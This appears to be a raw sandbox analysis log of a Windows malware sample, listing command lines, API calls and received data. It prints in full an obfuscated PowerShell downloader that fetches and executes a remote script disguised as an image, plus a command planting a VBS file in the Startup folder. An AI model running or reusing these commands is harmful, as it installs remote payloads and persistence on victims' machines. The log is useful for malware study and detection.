cmdline Powershell $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01100011,01101110,01100001,01101101,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01100011,01101110,01100001,01101101,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
cmdline Powershell Move-item 'C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs'
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs'
file C:\Users\test22\AppData\Local\Temp\97c2e543-1829-4fd6-91a1-35d2e827242f\AgileDotNetRT.dll
wmi Select * from Win32_PingStatus where ((Address='google.com') And TimeToLive=80 And BufferSize=32)
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: Powershell
parameters: $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01100011,01101110,01100001,01101101,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
filepath: Powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: Powershell
parameters: Move-item 'C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs'
filepath: Powershell
1 1 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs
flags: 2
oldfilepath_r: C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs
newfilepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Protected%20Client.vbs
oldfilepath: C:\Users\test22\AppData\Local\Temp\Protected%20Client.vbs
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received D,_*A9,_*10,_*36,_*DF,_*DD,_*11,_*00,_*F3,_*8B,_*3A,_*59,_*46,_*DD,_*33,_*F9,_*C1,_*85,_*A9,_*EF,_*CF,_*34,_*FC,_*6E,_*08,_*FB,_*FB,_*ED,_*B9,_*26,_*2E,_*3A,_*36,_*D7,_*85,_*ED,_*B7,_*DE,_*8E,_*82,_*FA,_*E6,_*1B,_*8B,_*19,_*1C,_*DD,_*96,_*D5,_*99,_*9F,_*CE,_*5C,_*B7,_*8D,_*5F,_*32,_*A9,_*B1,_*F2,_*11,_*E4,_*A7,_*D1,_*B3,_*53,_*1E,_*16,_*9C,_*F7,_*0A,_*28,_*B5,_*1E,_*FA,_*39,_*31,_*33,_*0C,_*C6,_*97,_*F9,_*B6,_*F6,_*37,_*18,_*AF,_*F5,_*90,_*D3,_*4B,_*B3,_*7E,_*20,_*F9,_*E0,_*CC,_*E5,_*31,_*3E,_*60,_*8F,_*DB,_*F3,_*4C,_*DC,_*92,_*0A,_*C0,_*FF,_*B5,_*B5,_*B8,_*7E,_*E8,_*8D,_*1D,_*4C,_*BB,_*1E,_*73,_*EF,_*63,_*FB,_*C6,_*83,_*FE,_*C8,_*13,_*CB,_*7C,_*DC,_*D5,_*DF,_*B7,_*9A,_*C1,_*F8,_*C6,_*78,_*81,_*7C,_*53,_*09,_*87,_*A5,_*DF,_*B2,_*D2,_*64,_*2E,_*8C,_*7F,_*60,_*2B,_*CC,_*AF,_*8C,_*62,_*6D,_*FF,_*B4,_*74,_*EA,_*E7,_*B6,_*33,_*B6,_*E3,_*3F,_*85,_*C2,_*7E,_*6A,_*E2,_*31,_*75,_*0D,_*E8,_*3B,_*73,_*C9,_*52,_*A3,_*6C,_*60,_*E4,_*E1,_*32,_*8A,_*E6,_*97,_*96,_*95,_*99,_*1D,_*6F,_*6F,_*86,_*DA,_*43,_*FB,_*96,_*A2,_*CC,_*20,_*C5,_*78,_*76,_*E2,_*FE,_*C2,_*77,_*7C,_*86,_*F1,_*AE,_*F8,_*04,_*FD,_*5D,_*F4,_*89,_*79,_*3E,_*16,_*DA,_*1B,_*F9,_*9E,_*7C,_*BB,_*FD,_*B7,_*CF,_*8D,_*D7,_*AD,_*02,_*66,_*8F,_*B3,_*82,_*F3,_*FD,_*63,_*D3,_*2B,_*A1,_*C2,_*0F,_*E7,_*66,_*F9,_*C4,_*15,_*ED,_*B7,_*6B,_*BB,_*DE,_*71,_*F2,_*F1,_*DD,_*A5,_*BD,_*14,_*F9,_*A4,_*6F,_*EC,_*C5,_*59,_*43,_*BC,_*8D,_*C0,_*5E,_*B3,_*1B,_*BF,_*AC,_*8F,_*2A,_*94,_*F1,_*2F,_*C2,_*FD,_*61,_*7F,_*47,_*FE,_*ED,_*F6,_*3B,_*73,_*3C,_*A2,_*0A,_*5C,_*F8,_*33,_*F3,_*98,_*45,_*C6,_*6F,_*8F,_*80,_*BD,_*9A,_*3C,_*16,_*15,_*78,_*97,_*5C,_*28,_*C0,_*F2,_*70,_*5F,_*CB,_*C3,_*F7,_*35,_*33,_*C1,_*5D,_*C8,_*57,_*4E,_*BF,_*92,_*78,_*34,_*80,_*F3,_*13,_*FF,_*F1,_*49,_*12,_*8F,_*81,_*70,_*9F,_*F1,_*98,_*76,_*9C,_*C4,_*A3,_*31,_*9C,_*FF,_*85,_*B7,_*56,_*93,_*78,_*14,_*34,_*AA,_*C8,_*87,_*A8,_*C8,_*B7,_*A8,_*C8,_*EB,_*AA,_*C8,_*5F,_*57,_*91,_*1F,_*AA,_*22,_*DF,_*AA,_*22,_*4F,_*53,_*91,_*BF,_*A2,_*22,_*3F,_*5C,_*45,_*FE,_*99,_*8A,_*3C,_*53,_*45,_*FE,_*A5,_*8A,_*BC,_*4C,_*45,_*BE,_*5E,_*45,_*7E,_*80,_*8A,_*FC,_*1F,_*2A,_*F2,_*53,_*55,_*E4,_*1B,_*54,_*E4,_*07,_*AB,_*C8,_*3F,_*56,_*91,_*FF,_*51,_*45,_*FE,_*86,_*8A,_*BC,_*AB,_*8A,_*7C,_*B3,_*8A,_*FC,_*4C,_*15,_*F9,_*DB,_*2A,_*F2,_*9E,_*2A,_*F2,_*5F,_*55,_*E4,_*13,_*55,_*E4,_*0F,_*AB,_*C8,_*F7,_*55,_*91,_*FF,_*A8,_*22,_*3F,_*51,_*45,_*FE,_*B8,_*8A,_*7C,_*7F,_*15,_*F9,_*77,_*5D,_*F2,_*E8,_*2F,_*4F,_*E0,_*5F,_*7E,_*57,_*E0,_*AF,_*4F,_*38,_*52,_*FE,_*DD,_*E7,_*FF,_*E1,_*53,_*8A,_*14,_*7F,_*27,_*95,_*EB,_*44,_*7E,_*AF,_*80,_*5D,_*AD,_*42,_*53,_*81,_*3E,_*AE,_*42,_*D3,_*80,_*BE,_*A7,_*42,_*D3,_*81,_*FE,_*04,_*78,_*2F,_*25,_*CD,_*00,_*9A,_*A7,_*F8,_*7B,_*B8,_*84,_*56,_*03,_*DA,_*8B,_*D2,_*5D,_*CF,_*04,_*3A,_*5E,_*A5,_*1E,_*E6,_*C1,_*96,_*03,_*DD,_*4F,_*49,_*AB,_*03,_*8D,_*FF,_*0A,_*A6,_*EA,_*F8,_*B7,_*52,_*FE,_*EB,_*F9,_*EC,_*A5,_*28,_*6C,_*82,_*DB,_*6B,_*E0,_*F1,_*28,_*F5,_*FF,_*A7,_*47,_*1F,_*26,_*15,_*AB,_*9
Data received E,_*3B,_*7A,_*8D,_*98,_*6F,_*13,_*2F,_*F0,_*99,_*BE,_*B7,_*2A,_*D3,_*C2,_*2C,_*CF,_*6A,_*60,_*F9,_*CB,_*F8,_*D5,_*05,_*6A,_*CC,_*63,_*0E,_*E8,_*04,_*CD,_*42,_*63,_*EA,_*C6,_*0B,_*39,_*F6,_*97,_*1F,_*2D,_*1D,_*E4,_*F5,_*A3,_*FD,_*88,_*8F,_*D7,_*97,_*EF,_*B8,_*97,_*50,_*78,_*30,_*32,_*3E,_*F2,_*47,_*4E,_*21,_*AB,_*5D,_*33,_*DB,_*B0,_*E8,_*D9,_*FC,_*69,_*7E,_*27,_*A8,_*59,_*47,_*45,_*6A,_*9E,_*8B,_*A7,_*EA,_*D7,_*B4,_*37,_*0D,_*5D,_*73,_*FE,_*E5,_*0E,_*93,_*D0,_*9B,_*4B,_*37,_*4F,_*F3,_*D8,_*23,_*DE,_*E2,_*B4,_*B2,_*F4,_*86,_*EF,_*00,_*B5,_*A3,_*13,_*A9,_*B4,_*0E,_*6B,_*37,_*F5,_*5A,_*D9,_*25,_*DF,_*A8,_*43,_*26,_*CF,_*99,_*D3,_*D6,_*D4,_*6F,_*2A,_*BC,_*6C,_*B7,_*6C,_*05,_*E7,_*69,_*70,_*B2,_*5D,_*D5,_*E9,_*F2,_*30,_*FD,_*85,_*B6,_*F2,_*01,_*9B,_*37,_*57,_*EE,_*57,_*FB,_*62,_*5A,_*14,_*CC,_*F8,_*1C,_*13,_*7F,_*65,_*BE,_*0F,_*A5,_*DA,_*B5,_*C7,_*02,_*97,_*85,_*25,_*63,_*43,_*A2,_*4E,_*D4,_*AF,_*08,_*38,_*E1,_*F2,_*5A,_*7D,_*5C,_*50,_*AB,_*87,_*FF,_*3B,_*EE,_*B4,_*F2,_*92,_*CC,_*51,_*EC,_*2F,_*06,_*55,_*FD,_*8B,_*77,_*07,_*1F,_*9D,_*F9,_*D3,_*17,_*74,_*66,_*83,_*A0,_*29,_*77,_*D6,_*1F,_*E7,_*59,_*77,_*97,_*CF,_*FA,_*F1,_*26,_*BB,_*69,_*49,_*BD,_*45,_*E1,_*07,_*AE,_*CF,_*C2,_*FA,_*64,_*FF,_*10,_*EE,_*0A,_*BF,_*64,_*8F,_*2A,_*6F,_*B7,_*AD,_*32,_*83,_*AA,_*A1,_*AC,_*71,_*41,_*8D,_*43,_*69,_*A6,_*AC,_*03,_*C3,_*3F,_*6A,_*C5,_*8C,_*3F,_*16,_*58,_*90,_*F7,_*CC,_*3D,_*63,_*4B,_*6E,_*7D,_*53,_*A1,_*DA,_*24,_*BD,_*F3,_*26,_*B1,_*BD,_*83,_*68,_*67,_*8
Data received 7,_*F7,_*92,_*5B,_*6C,_*1E,_*13,_*F2,_*FE,_*73,_*E1,_*E0,_*A1,_*BD,_*7E,_*E1,_*4C,_*5B,_*50,_*FF,_*D8,_*E4,_*C6,_*60,_*ED,_*C2,_*1C,_*6B,_*F7,_*21,_*2F,_*ED,_*1F,_*6F,_*1C,_*7A,_*AA,_*61,_*E1,_*FC,_*49,_*E5,_*4D,_*DB,_*7B,_*B9,_*0F,_*B9,_*DB,_*67,_*E2,_*D3,_*D0,_*94,_*69,_*F5,_*1F,_*2F,_*19,_*87,_*86,_*56,_*5F,_*4E,_*DC,_*BC,_*21,_*C7,_*EC,_*C0,_*55,_*C9,_*95,_*D6,_*6D,_*6B,_*46,_*4C,_*0B,_*F0,_*5E,_*77,_*79,_*CF,_*AF,_*61,_*77,_*19,_*85,_*7D,_*06,_*8E,_*A2,_*CF,_*B8,_*99,_*6C,_*FB,_*B9,_*DF,_*EA,_*79,_*2F,_*AE,_*98,_*E6,_*B9,_*18,_*2F,_*9B,_*92,_*90,_*E5,_*7C,_*23,_*59,_*2F,_*91,_*5A,_*AB,_*63,_*39,_*DD,_*2C,_*80,_*2A,_*EF,_*13,_*69,_*36,_*76,_*AE,_*D1,_*F9,_*B2,_*E0,_*3C,_*F3,_*ED,_*1A,_*0B,_*FB,_*67,_*C4,_*E4,_*7B,_*B8,_*66,_*14,_*46,_*4D,_*E8,_*2F,_*A8,_*8D,_*BE,_*7A,_*D2,_*F2,_*DD,_*31,_*EB,_*52,_*99,_*56,_*69,_*56,_*8B,_*E8,_*A5,_*47,_*A5,_*AF,_*86,_*76,_*82,_*C5,_*D0,_*41,_*42,_*DF,_*D9,_*1E,_*DA,_*42,_*AD,_*4B,_*C5,_*F5,_*7D,_*5B,_*3D,_*B5,_*5A,_*7C,_*D8,_*6F,_*36,_*69,_*64,_*5A,_*B6,_*AE,_*D6,_*B8,_*C9,_*7E,_*13,_*56,_*B4,_*8A,_*F5,_*E1,_*67,_*FF,_*74,_*FA,_*08,_*F7,_*25,_*D5,_*03,_*F8,_*2B,_*FA,_*34,_*AC,_*E4,_*A5,_*F5,_*D0,_*E0,_*15,_*6F,_*F2,_*3F,_*42,_*DF,_*35,_*BA,_*8A,_*1F,_*AA,_*F9,_*CC,_*8D,_*D1,_*8B,_*AA,_*CF,_*8F,_*F4,_*CC,_*BF,_*55,_*15,_*BA,_*F3,_*C9,_*A7,_*E2,_*0D,_*DE,_*26,_*E1,_*F5,_*13,_*7A,_*94,_*F4,_*1E,_*E0,_*34,_*8A,_*7B,_*F1,_*8E,_*D9,_*BC,_*DE,_*03,_*A2,_*D4,_*AA,_*CD,_*8B,_*16,_*44,_*CD,_*11,_*B2,_*CB,_*6
Data received E,_*11,_*1A,_*38,_*1E,_*17,_*3D,_*17,_*9E,_*13,_*47,_*6E,_*62,_*EE,_*6B,_*62,_*7A,_*EE,_*B9,_*FA,_*10,_*E4,_*34,_*7C,_*52,_*28,_*5F,_*10,_*68,_*FF,_*2A,_*85,_*28,_*46,_*04,_*24,_*95,_*9A,_*72,_*B4,_*4B,_*46,_*96,_*7D,_*CA,_*8F,_*79,_*62,_*BA,_*18,_*E8,_*80,_*6B,_*37,_*42,_*5B,_*77,_*99,_*B5,_*0B,_*28,_*9D,_*DC,_*B1,_*78,_*2A,_*24,_*AD,_*3D,_*46,_*9E,_*D0,_*C6,_*6F,_*D0,_*3D,_*99,_*FB,_*FE,_*55,_*E1,_*01,_*4A,_*24,_*81,_*7D,_*12,_*95,_*94,_*6D,_*60,_*03,_*4E,_*75,_*73,_*28,_*94,_*0B,_*7B,_*B8,_*00,_*95,_*DB,_*60,_*17,_*07,_*7F,_*64,_*0B,_*F8,_*FD,_*9A,_*4E,_*2A,_*B5,_*57,_*C7,_*9D,_*38,_*84,_*FD,_*9F,_*6C,_*10,_*C3,_*EC,_*BD,_*60,_*BB,_*BE,_*90,_*DA,_*AC,_*06,_*B5,_*E8,_*35,_*91,_*06,_*B6,_*39,_*E2,_*27,_*C4,_*10,_*BB,_*24,_*87,_*77,_*99,_*35,_*79,_*E4,_*36,_*15,_*92,_*36,_*43,_*3A,_*F8,_*BF,_*50,_*E5,_*A0,_*C7,_*7F,_*9B,_*10,_*DB,_*FC,_*87,_*23,_*D6,_*AA,_*A0,_*74,_*52,_*35,_*71,_*7C,_*85,_*E3,_*EC,_*F7,_*FE,_*9B,_*B6,_*1F,_*EC,_*08,_*9E,_*FF,_*86,_*DE,_*07,_*7A,_*57,_*6A,_*C0,_*5D,_*99,_*0E,_*1E,_*FF,_*04,_*C3,_*2C,_*A1,_*9D,_*54,_*32,_*63,_*9E,_*11,_*68,_*C6,_*94,_*30,_*87,_*53,_*9A,_*8B,_*16,_*DA,_*E2,_*58,_*6C,_*65,_*3F,_*11,_*38,_*76,_*DB,_*59,_*68,_*99,_*48,_*C8,_*A3,_*CB,_*01,_*28,_*06,_*D5,_*F7,_*54,_*D0,_*1E,_*85,_*99,_*80,_*3C,_*46,_*62,_*9B,_*0F,_*CC,_*4A,_*38,_*FC,_*4E,_*96,_*E8,_*63,_*21,_*CB,_*B2,_*84,_*28,_*87,_*62,_*80,_*BA,_*CC,_*C0,_*95,_*75,_*7A,_*79,_*F7,_*FF,_*07,_*E3,_*9B,_*E7,_*2D,_*E3,_*E8,_*71,_*37,_*3F,_*CD,_*24,_*76,_*E8,_*71,_*50,_*7E,_*BA,_*DC,_*BB,_*4C,_*8F,_*ED,_*45,_*E8,_*AC,_*F7,_*8F,_*E0,_*06,_*EB,_*EF,_*6E,_*F8,_*C9,_*EF,_*77,_*AD,_*21,_*BB,_*E5,_*0B,_*05,_*E4,_*21,_*CC,_*8A,_*E4,_*95,_*EF,_*B9,_*5A,_*07,_*80,_*3D,_*8B,_*1E,_*62,_*AE,_*2A,_*D1,_*3A,_*44,_*3F,_*75,_*35,_*F3,_*7D,_*38,_*A2,_*C1,_*B1,_*6F,_*09,_*59,_*9A,_*BF,_*CF,_*2F,_*21,_*C0,_*64,_*F5,_*98,_*1F,_*FA,_*2A,_*D9,_*5F,_*7B,_*F7,_*62,_*29,_*DA,_*32,_*4C,_*9E,_*6C,_*33,_*68,_*51,_*EC,_*A1,_*22,_*DE,_*B8,_*5D,_*A5,_*51,_*86,_*48,_*BB,_*75,_*EC,_*A0,_*9B,_*A0,_*51,_*60,_*A2,_*99,_*F0,_*34,_*D6,_*72,_*56,_*3B,_*4D,_*3F,_*D5,_*4E,_*26,_*AF,_*FF,_*E